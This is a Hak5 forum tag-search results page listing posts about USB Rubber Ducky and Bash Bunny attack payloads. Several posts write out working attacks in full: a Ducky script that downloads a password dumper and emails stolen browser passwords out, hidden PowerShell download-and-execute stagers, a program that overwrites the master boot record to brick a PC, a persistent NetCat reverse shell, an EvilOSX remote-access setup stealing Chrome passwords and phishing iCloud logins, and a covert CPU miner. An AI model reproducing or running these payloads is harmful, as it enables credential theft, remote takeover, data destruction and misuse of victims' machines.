Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'payload'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 50 results

  1. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  2. jafahulo

    [PAYLOAD] UnifiedRickRollWindows

    In the spirit of april fools, I ported the original UnifiedRickRoll to windows, so you can easily switch between apple and windows computers and still get the same effect. https://github.com/hak5/bashbunny-payloads/pull/139
  3. Robert.sz

    grab browsers password

    Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !
  4. Harold Finch

    Payload for android

    Hi dear friends. I watched to this video. But I dont know, which payload he was use in this video. So, what do you think about it? Which payload must be it?
  5. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING) I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS. CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM 1. Download the precompiled boot.exe (source code is here if you want to compile yourself): #include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; } 2. Create Folder exec on your ducky sdcard and copy boot.exe into it. 3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin 4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY): REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier boot.exe
  6. Hey, I have made a group to build, programs, tools, payloads, etc. If you have an idea or want to commute just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R
  7. Patr

    USB Rubber Ducky

    Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  8. Patr

    Downoload Payload

    Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.
  9. I came up with the idea to "misuse" the LED colors (8 payload possiblilties) as payload indicator. This allows to use switch position 2 to select the payload (it copies the payload content to switch1) and make your selection with moving the switch to position 1. Pluggin in the stick with position 1 will execute your payload and indicate the payload color for 1 sec. The project is hosted on Github: https://github.com/H8to/HoppEye Strange to explain, but cool if you get the hang of it. Folder structure looks like the following: payloads/ payload_B_BluePayload/ payload_G_Green/ payload_OFF_empty/ payload_W_network/ payload_C_empty/ payload_M_PoisonBunnyTap/ payload_R_ReverseShellEmpire/ payload_Y_empty/ switch1/ switch2/ payload.txt <-- This is where the magic happens Please see the Github for further info.
  10. Am3ience

    File Exfil for Linux?

    Hey guys, So there are a bunch of file exfiltration payloads for Windows on the git, but does anyone know of one for Linux? I'm trying to see if I can exfil all .docx or .pdf from a folder on linux to the Bash Bunny. Any help would be great, thanks!
  11. Robert.sz

    grab browsers password

    Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !
  12. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin. Any ideas? Best regards! F
  13. stekole

    [PAYLOAD] untitled_EVILOSX

    Please check git for the latest README/code https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX untitled_EVILOSX + ______ _ _ ____ _____ __ __ + | ____| (_)| | / __ \ / ____|\ \ / / + | |__ __ __ _ | || | | || (___ \ V / + | __|\ \ / /| || || | | | \___ \ > < + | |____\ V / | || || |__| | ____) | / . \ + |______|\_/ |_||_| \____/ |_____/ /_/ \_\\ + untitled_ bash bunny edition / stekole ** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. ** Features Client reconnects automatically/persistence ECM_ETHERNET and HID attack Emulate a simple terminal instance. Sockets are encrypted with CSR via OpenSSL. No dependencies (pure python). Retrieve Chrome passwords. Retrieve iCloud contacts. Attempt to get iCloud password via phishing. Show local iOS backups. Download and upload files. Retrieve find my iphone devices. Attempt to get root via local privilege escalation (<= 10.10.5). Auto installer Configuration Server To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server. git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX ./Server and type your listening port (1337) Client Before you deploy your bash bunny, update your configuration in the EvilOSX.py file At the bottom of the file you will see a server and port variable Set these to your server IP and listening port ######################### SERVER_HOST = "10.99.99.16" SERVER_PORT = 1337 ######################### Usage Plug in your bash bunny and wait until the script has finished running. You should see the client connect to the server root@kali:~/git/EvilOSX# ./Server.py ______ _ _ ____ _____ __ __ | ____| (_)| | / __ \ / ____|\ \ / / | |__ __ __ _ | || | | || (___ \ V / | __|\ \ / /| || || | | | \___ \ > < | |____\ V / | || || |__| | ____) | / . \ |______|\_/ |_||_| \____/ |_____/ /_/ \_\ [?] Port to listen on: 1337 [I] Type "help" to get a list of available commands. > help help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. exit - Close the server and exit. > clients [I] 1 client(s) available: 0 = client_hostname > connect 0 [I] Connected to "client_hostname", ready to send commands. Some of the other features can be found in the help menu. I have not tried them all help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. get_info - Show basic information about the client. get_root - Attempt to get root via local privilege escalation. download <path> - Downloads the file to the local machine. upload <path> - Uploads the file to the remote machine. chrome_passwords - Retrieve Chrome passwords. icloud_contacts - Retrieve iCloud contacts. icloud_phish - Attempt to get iCloud password via phishing. itunes_backups - Show the user's local iOS backups. find_my_iphone - Retrieve find my iphone devices. screenshot - Takes a screenshot of the client. kill_client - Brutally kill the client (removes the server). exit - Exits the session. Any other command will be executed on the connected client. Removal of Tool The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory rm -rf ~/Library/Containers/.EvilOSX/ launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist Defence disable the command-space short key for spotlight or disable spotlight all together if not needed Todo Issues I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py Run ./BUILDER and enter the appropriate information: After, copy this to your switch payload Thanks @Marten4n6 [YOURMOM](Check my room)
  14. Hello Everyone, You may have seen my last post on the iMessage Taker. It was unstable and had timing issues. Well today I am here to rectify the situation. I have vastly improved the script to allow for much quicker operation and reliability. Basically the ducky script is quite small and edits a "scpt" that it downloads from a Repo of mine. This script does require internet connection. In order to change the script to send the Messages to your email all you need to do is change "YOUREMAIL" to your preferred email. It will then take iMessages from the computer and send them to you. Short and Sweet! Enjoy! -wiredbrother https://pastebin.com/3fgET9zU P.S Would love everyone's though on this.
  15. Hi guys, another question. Is it possible to chain payloads one after another? Basically what I want to do is use the Nmapper Payload then the InfoGrabber payload right after the scan. They both go off correctly when done by themselves, but when I try to copy and paste the nmapper onto the InfoGrabber payload, nothing goes off. No LEDs or anything after the initial green. The code is below: # See nmap --help for options. Default "-O --fuzzy" profiles target OS. NMAP_OPTIONS="-O --fuzzy"" LOOTDIR=/root/udisk/loot/nmap ######## INITIALIZATION ######## LED SETUP # Use RNDIS for Windows. Mac/Linux use ECM_ETHERNET ATTACKMODE RNDIS_ETHERNET #ATTACKMODE ECM_ETHERNET GET TARGET_IP GET TARGET_HOSTNAME GET SWITCH_POSITION ######## MAKE LOOT DIRECTORY ######## # Setup named logs in loot directory mkdir -p $LOOTDIR HOST=${TARGET_HOSTNAME} # If hostname is blank set it to "noname" [[ -z "$HOST" ]] && HOST="noname" COUNT=$(ls -lad $LOOTDIR/$HOST*.log | wc -l) COUNT=$((COUNT+1)) ######## ERROR IF NO TARGET IP ######## if [ -z "${TARGET_IP}" ]; then LED FAIL exit 1 fi ######## ATTACK ######## LED ATTACK nmap $NMAP_OPTIONS $TARGET_IP >> $LOOTDIR/$HOST-$COUNT.log ######################################################################################## Info Grab ATTACKMODE HID STORAGE LED SPECIAL # Run the run.ps1 script in the BashBunny RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" ######## CLEANUP ######## LED CLEANUP sync ######## FINISH ######## LED FINISH
  16. Hey, I have made a group to build, programs, tools, payloads, etc. If you have an idea or want to commute just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R
  17. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 😉) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! 😃 and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  18. Hey all, first post here! I am working on a payload that, when connected to an unlocked Android device, will open the Gmail, attach a number of files, and then send the email. I am having issues with opening the "attach files" menu (the paperclip icon) because I cannot seem to see a way to get the keyboard to tab over to it. Here is what I have so far, tested on a Pixel XL, latest version, with a HP USB Keyboard. Windows + G > Opens Gmail CTRL + N > Create new email someone@domain.com > Enter in the desired destination email. ENTER > Confirms the email address you entered TAB TAB > Moves cursor to Subject Line > Add an email subject. TAB > Moves cursor to body. Text. > Add text to body. Magic happens? This is where I cannot click the paperclip icon, but if I do it on the touch screen, I can finish it out with the keyboard... SHIFT + DOWN ARROW > Selects file(s). SHIFT + ENTER > Attaches files. CTRL + ENTER > Send the email. Any help or thoughts would be greatly appreciated! Cheers!
  19. RazerBlade

    [PAYLOAD] PasswordGrabber

    Link to github: https://github.com/hak5/bashbunny-payloads/pull/67 Comment if you would like to see some improvments or changes.
  20. Hello peeps! So i was thinking yesterday, cant we skip all that long-taking payload typing to get a reverse shell? Here is where i thought of pastebin and wget to bat! It's really simple and just an upgrade. DELAY 500 GUI R DELAY 500 STRING powershell ENTER DELAY 1500 LEFTARROW DELAY 100 ENTER DELAY 2000 ALT TAB DELAY 100 STRING cd %temp% ENTER STRING <the pastebin raw> -UseBasicParsing -OutFile pay.bat ENTER DELAY 100 STRING ./pay.bat ENTER The pastebin raw would look like this powershell -nop -wind hidden -noni -enc <your encoded metasploit payload> NP. -BrianNovius
  21. This thread is just to talk about the possibilities of PrivateLocker on BashBunny.. PrivateLocker encrypts all files in your Personal Locker (made by the Program) and writes a Unique key in a Directory in the local directory of the Program. I don't know if anyone would be interested in a Payload consisting of a "Paid" program instead of a Open-Source Program. Only issue I could think of this Payload would be trying to figure out the transfer of the keys since all keys are written to a local directory of the EXE. (and coming up with the $$ for the Encryption Tool) Any Ideas?
  22. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting
  23. Ar1k88

    [PAYLOAD] BunnyMiner

    BunnyMiner By Ar1k88 I'm going to "quietly" sneak this onto the thread... **** PLEASE DO NOT USE THIS ON OTHER PEOPLE'S PC'S! MYSELF, & MINERGATE DO NOT ENCOURAGE SUCH USE! **** Anyways, this is just a Simple CPU Miner from my Collection of Odd Scripts. And figured since this place doesn't cover this topic, I would try to do it myself. This is a SMALL NON-Silent CPU Miner, yes it can be made to be silent. The whole object of this post would be for demonstration purposes. I'll just post it and see what happens. :) payload.txt #!/bin/bash # # Title: USB CPU Miner # Author: Ar1k88 # Version: 1.1g # Target: Windows 7-10 # Category: Exploiting Resources # Sub-Category: Cryptocurrency # # I'm not promoting here. BUT since I do work for MinerGate (a HUGE Cryptocurrency Mining Pool) I am releasing # a Simple Non-Silent CPU Miner. Just to show that it is possible to mine Digital Currency with a USB. # # Please change the credentials in "config.txt" to this format: # <algorithim> # <pool stratum> # <username/wallet> # <cores/threads> # # Keep in mind this is just a Simple CPU Miner. I will leave the code here. You will need to go to # https://github.com/tpruvot/cpuminer-multi/releases/download/v1.3-multi/cpuminer-multi-rel1.3.zip # Extract the EXE's and use the x86 (32Bit) version due to it supports both 32Bit and 64Bit CPU # architectures. Add "cpuminer-x86.exe" and "msvcr120.dll" to the payload folder, and rename it to "2.exe". # Enjoy! -Ar1k88 # Grace-period for PC to recognize the BashBunny. Q DELAY 300 # Setting up and Attacking! CHARRRRGGGEEE!!! LED ATTACK # NOTE: Setting to Read-Only Storage to prevent Anti-virus's from removing binary files. (EXE's) ATTACKMODE HID RO_STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')" LED FINISH 1.cmd @echo Off cls REM This is to set easy to edit files for new users. Anyone who used a Console Miner would know what this is. REM -Ar1k88 SetLocal EnableDelayedExpansion Set n= Set ConfigFile=%~dp0\config.txt For /F "tokens=*" %%I IN (%ConfigFile%) DO ( Set /a n+=1 Set var!n!=%%I ) echo %var3% call %~dp0\2.exe -a %var1% -o %var2% -u %var3% -p x -t %var4% pause EndLocal @exit /B Config.txt is set up as following: <algorithm> <stratum> <email/wallet> <threads/cores> config.txt cryptonight stratum+tcp://aeon.pool.minergate.com:45550 demoemailaddress@email.com 2 Enjoy! P.S. - If you want to sign up to show this off to your friends or for work. Can easily create a account at MinerGate. http://bit.ly/MinerGateSignUp https://twitter.com/ar1k88 -Ar1k88
  24. I have been troubleshooting issues with the bashbunny for as long as it has been available. I got mine as soon as it was released; and it has been nothing but problematic from day one; which is a shame. The device, in theory, is probably the best thing Hak5 has ever come out with; but it practice, it has been the least usable in my experience. Many payloads will not run consistently; if they run properly at all. Every payload that makes use of the USB partition (the one thing that should really allow us to accomplish truly amazing feats) is problematic for many of its customers. The bashbunny forum is littered with threads full of people who cannot get any credential payloads to work because USB writing fails; among other problems. Simple ducky payloads that execute fine on the ducky or on nethunter's duckhunter will not inject properly a fair percentage of the time on the bashbunny. I see mixed character case issues where they shouldn't be and other anomalies. I am really hoping the USB corruption issues and the bizarre injection problems I am having is due solely to the fact that I adopted so early and the rest of the devices are not plagued with these issues; as they make the device unusable. I am pleading with Hak5 support here to please provide me with a replacement. I and my friends have poured countless hours of time and ulcers into trying to get this device to work; with, very little and, no lasting success. Anything we get to to work once or twice is quickly broken by yet another USB corruption issue or other strange injection anomaly. Please help me. I have gone through every unbricking, reflashing, updating, and udisk reformatting operation that support has given and have tried every firmware available. Nothing seems to be able to salvage this bunny. Help me technolust-ken-obee. You're my only hope...
  25. Jsync

    How to get Police LED

    Hi how do i get the police led sequence from the update flashes I want to implement this sequence into my payload, whats the code I need to write to get the sequence and how do I change the colours and the timing. Changing the colours and timing is just changing values but I don,t know how to recreate the police lighting. Thanks
×